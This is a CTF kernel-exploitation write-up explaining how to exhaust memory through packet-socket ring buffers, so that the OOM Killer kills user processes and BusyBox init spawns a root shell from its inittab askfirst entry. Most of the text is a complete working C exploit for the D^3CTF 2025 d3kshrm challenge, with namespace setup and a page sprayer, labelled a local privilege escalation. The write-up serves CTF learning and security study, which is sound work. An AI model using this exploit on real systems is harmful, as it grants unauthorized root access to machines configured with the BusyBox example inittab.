Triggering the OOM Killer via Memory Exhaustion to Obtain a Root Shell

This trick works mainly because the challenge author configured the environment too conventionally, following BusyBox's official documentation too closely.

On a typical Linux system, the memory a single process can allocate is bounded by resource limits and the overcommit policy, which are usually generous. In CTF environments, however, the virtual machine itself usually has very little memory (e.g., 128 MB), so user processes can easily exhaust the system's physical memory. At that point the kernel wakes up the OOM Killer, which frees memory by killing processes.

The OOM Killer chooses its victim by assigning every process an OOM Score and killing the process with the highest score. The score is computed mainly from how much memory the process uses (resident pages, swap entries and page tables), adjusted by the process's /proc/[pid]/oom_score_adj value; older kernels also gave privileged processes a small discount. A higher score therefore means a higher likelihood of being killed. We can view a process's current score through procfs at /proc/[pid]/oom_score. Note that the OOM Killer may end up killing several processes for a single allocation request: if the memory reclaimed from one victim is not enough to satisfy the request (for example, because of memory fragmentation or because the victim owned little memory), the allocation fails again and another victim is selected.

In CTF kernel pwn environments such as the one described in the previous article, three user-space processes matter here: rcS, the sh it spawns for the player, and the exploit. What happens when all three are killed? Nothing holds the console (ttyS0) any more. /sbin/init (PID 1, which the OOM Killer never selects) reaps its terminated children and, following /etc/inittab, starts the user-space program specified by the ::askfirst: entry. Since init runs as root, that program also runs with root privileges (BusyBox first prints "Please press Enter to activate this console." and waits for Enter).

Until recently, most Linux kernel pwn environments directly or indirectly followed the example configuration provided by BusyBox. The example /etc/inittab, which also documents the default behavior when the file does not exist, is as follows:

# Note: BusyBox init works just fine without an inittab. If no inittab is
# found, it has the following default behavior:
#   ::sysinit:/etc/init.d/rcS
#   ::askfirst:/bin/sh
#   ::ctrlaltdel:/sbin/reboot
#   ::shutdown:/sbin/swapoff -a
#   ::shutdown:/bin/umount -a -r
#   ::restart:/sbin/init
#   tty2::askfirst:/bin/sh
#   tty3::askfirst:/bin/sh
#   tty4::askfirst:/bin/sh

The ::askfirst: entry is configured as /bin/sh, which means that if we can get the OOM Killer to kill every user-space process except PID 1, we automatically obtain a root shell. In a freshly booted CTF kernel pwn environment, rcS and sh typically share the same OOM Score (usually 678), while the exploit process starts with a lower one (typically 666). As long as the exploit's score stays below theirs during the mass allocation, it will be the last process killed, which guarantees that the console is eventually left without any process on it and the root shell is spawned.

However, simply allocating memory is not enough. Allocating large amounts of memory directly from the exploit makes its OOM Score grow rapidly, putting it at the head of the OOM Killer's queue. Once the exploit is killed, the allocations stop and the OOM Killer has no reason to kill anything else, so the only result is a dead exploit.

Therefore, the attack requires allocating memory without raising the exploit's OOM Score. This can typically be done by making the kernel allocate pages that are not charged to our process's memory footprint. A good example is the ring buffer of a packet socket. Alternatively, if the challenge itself provides a way to allocate large numbers of pages (as in D^3CTF2025 - d3kshrm), the challenge's own interface can usually be used for the allocation directly. Below is a minimal POC based on packet sockets (wrapper functions such as create_pgv_socket() are defined in the full D^3CTF2025 - d3kshrm exploit):

void unintended_exploit(void)
{
    int ret;

    /* fork the helper child that owns the packet sockets */
    prepare_pgv_system();

    for (int i = 0; i < 1000; i++) {
        /* one packet socket per iteration */
        if ((ret = create_pgv_socket(i)) < 0) {
            printf(ERROR_MSG("[x] Failed to allocate socket: ") "%d\n", i);
            err_exit("FAILED to allocate socket!");
        }

        /* attach a ring of 64 blocks x 256 KiB (16 MiB) to the socket;
         * these kernel pages do not raise our OOM Score */
        if ((ret = alloc_page(i, 0x1000 * 64, 64)) < 0) {
            printf(ERROR_MSG("[x] Failed to alloc pages on socket: ")"%d\n", i);
            err_exit("FAILED to allocate pages!");
        }

        printf("[*] No.%d times\n", i);
        fflush(stdout);
    }

    puts("Done!?");
}

By contrast, commonly used heap-spraying objects such as pipe_buffer or msg_msg are not suitable for this scenario, because allocating them increases the OOM Score.

Note that this approach does not guarantee a root shell. More likely outcomes are a kernel panic such as "System is deadlocked on memory" (raised when no killable process is left) or some other out-of-memory failure. In practice, therefore, this trick is not reliable enough to count on in general.

Example: D^3CTF 2025 - d3kshrm

The original challenge files can be downloaded from https://github.com/arttnba3/D3CTF2025_d3kshrm.

In this challenge, the author faithfully followed the BusyBox example and set the ::askfirst: entry in /etc/inittab to /bin/ash, so the OOM attack described above applies:

$ cat /etc/inittab
::sysinit:/etc/init.d/rcS
::askfirst:/bin/ash
::ctrlaltdel:/sbin/reboot
::shutdown:/sbin/swapoff -a
::shutdown:/bin/umount -a -r
::restart:/sbin/init

The challenge kernel allows unprivileged users to create packet sockets (the exploit obtains CAP_NET_RAW by entering new user and network namespaces), so we can use packet socket ring buffers to perform massive memory allocations and trigger the OOM Killer. The final exploit is as follows:

/**
 * Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
 * 
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sched.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/socket.h>

/**
 * Kernel Pwn Infrastructures
**/

#define SUCCESS_MSG(msg)    "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg)       "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg)      "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg)    puts(SUCCESS_MSG(msg))
#define log_info(msg)       puts(INFO_MSG(msg))
#define log_error(msg)      puts(ERROR_MSG(msg))

void err_exit(char *msg)
{
    printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

int unshare_setup(void)
{
    char edit[0x100];
    int tmp_fd;
    /* read the ids before unshare(): afterwards they report the overflow
     * id (65534) until uid_map/gid_map have been written */
    uid_t uid = getuid();
    gid_t gid = getgid();

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        log_error("[x] Unable to create new namespace for PGV subsystem");
        return -EPERM;
    }

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", (int)uid);
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", (int)gid);
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    return 0;
}

/**
 * pgv pages sprayer related
 * note that we should create two processes:
 * - the parent is the one to send cmds and get root
 * - the child creates an isolated namespace by calling unshare_setup(),
 *      then only receives cmds from the parent and executes them
**/

#define PGV_SOCKET_MAX_NR 1024
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

struct tpacket_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

struct pgv_page_request {
    int idx;
    int cmd;
    unsigned int size;
    unsigned int nr;
};

enum {
    PGV_CMD_ALLOC_SOCKET,
    PGV_CMD_ALLOC_PAGE,
    PGV_CMD_FREE_PAGE,
    PGV_CMD_FREE_SOCKET,
    PGV_CMD_EXIT,
};

enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

int cmd_pipe_req[2], cmd_pipe_reply[2];

int create_packet_socket()
{
    int socket_fd;
    int ret;

    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        log_error("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)");
        ret = socket_fd;
        goto err_out;
    }

    return socket_fd;

err_out:
    return ret;
}

int alloc_socket_pages(int socket_fd, unsigned int size, unsigned nr)
{
    struct tpacket_req req;
    int version, ret;

    version = TPACKET_V1;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, 
                     &version, sizeof(version));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_VERSION)");
        goto err_setsockopt;
    }

    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = nr;
    req.tp_frame_size = 0x1000;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_TX_RING)");
        goto err_setsockopt;
    }

    return 0;

err_setsockopt:
    return ret;
}

int free_socket_pages(int socket_fd)
{
    struct tpacket_req req;
    int ret;

    memset(&req, 0, sizeof(req));
    req.tp_block_size = 0x3361626e;
    req.tp_block_nr = 0;
    req.tp_frame_size = 0x74747261;
    req.tp_frame_nr = 0;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_TX_RING)");
        goto err_setsockopt;
    }

    return 0;

err_setsockopt:
    return ret;
}

void spray_cmd_handler(void)
{
    struct pgv_page_request req;
    int socket_fd[PGV_SOCKET_MAX_NR];
    int ret;

    /* create an isolated namespace */
    if (unshare_setup()) {
        err_exit("FAILED to initialize PGV subsystem for page spraying!");
    }

    memset(socket_fd, 0, sizeof(socket_fd));

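    /* handle requests */
    do {
        if (read(cmd_pipe_req[0], &req, sizeof(req)) != (ssize_t)sizeof(req)) {
            log_error("[x] PGV child failed to read a command");
            break;
        }

        /* reject out-of-range indices before touching socket_fd[] */
        if (req.cmd != PGV_CMD_EXIT
            && (req.idx < 0 || req.idx >= PGV_SOCKET_MAX_NR)) {
            ret = -EINVAL;
            write(cmd_pipe_reply[1], &ret, sizeof(ret));
            continue;
        }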

        switch (req.cmd) {
        case PGV_CMD_ALLOC_SOCKET:
            if (socket_fd[req.idx] != 0) {
                printf(ERROR_MSG("[x] Duplicate idx request: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = create_packet_socket();
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed at allocating packet socket"));
                break;
            }

            socket_fd[req.idx] = ret;
            ret = 0;

            break;
        case PGV_CMD_ALLOC_PAGE:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = alloc_socket_pages(socket_fd[req.idx], req.size, req.nr);
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed to alloc packet socket pages"));
                break;
            }

            break;
        case PGV_CMD_FREE_PAGE:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = free_socket_pages(socket_fd[req.idx]);
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed to free packet socket pages"));
                break;
            }

            break;
        case PGV_CMD_FREE_SOCKET:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            close(socket_fd[req.idx]);
            socket_fd[req.idx] = 0;     /* allow this idx to be reused */
            ret = 0;

            break;
        case PGV_CMD_EXIT:
            log_info("[*] PGV child exiting...");
            ret = 0;
            break;
        default:
            printf(
                ERROR_MSG("[x] PGV child got unknown command : ")"%d\n",
                req.cmd
            );
            ret = -EINVAL;
            break;
        }

        write(cmd_pipe_reply[1], &ret, sizeof(ret));
    } while (req.cmd != PGV_CMD_EXIT);
}

void prepare_pgv_system(void)
{
    /* pipe for pgv */
    pipe(cmd_pipe_req);
    pipe(cmd_pipe_reply);

    /* child process for pages spray */
    if (!fork()) {
        spray_cmd_handler();
        /* never fall through into the parent's exploit logic */
        exit(EXIT_SUCCESS);
    }
}

int create_pgv_socket(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_ALLOC_SOCKET,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int destroy_pgv_socket(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_FREE_SOCKET,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_FREE_PAGE,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(req));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    usleep(10000);

    return ret;
}

void banner(void)
{
    puts(SUCCESS_MSG("-------- D^3CTF2025::Pwn - d3kshrm --------") "\n"
    INFO_MSG("--------     Unintended Solution    --------\n")
    INFO_MSG("--------      Author: ")"arttnba3"INFO_MSG("      --------") "\n"
    SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));
}

void unintended_exploit(void)
{
    int ret;
    prepare_pgv_system();

    for (int i = 0; i < 1000; i++) {
        printf("[*] No.%d times\n", i);
        fflush(stdout);
        if ((ret = create_pgv_socket(i)) < 0) {
            printf(ERROR_MSG("[x] Failed to allocate socket: ") "%d\n", i);
            err_exit("FAILED to allocate socket!");
        }

        if ((ret = alloc_page(i, 0x1000 * 64, 64)) < 0) {
            printf(ERROR_MSG("[x] Failed to alloc pages on socket: ")"%d\n", i);
            err_exit("FAILED to allocate pages!");
        }
        puts("Done.");

        fflush(stdout);
        //sleep(1);
    }

    puts("Done!?");
}

int main(int argc, char **argv, char **envp)
{
    banner();
    unintended_exploit();
    return 0;
}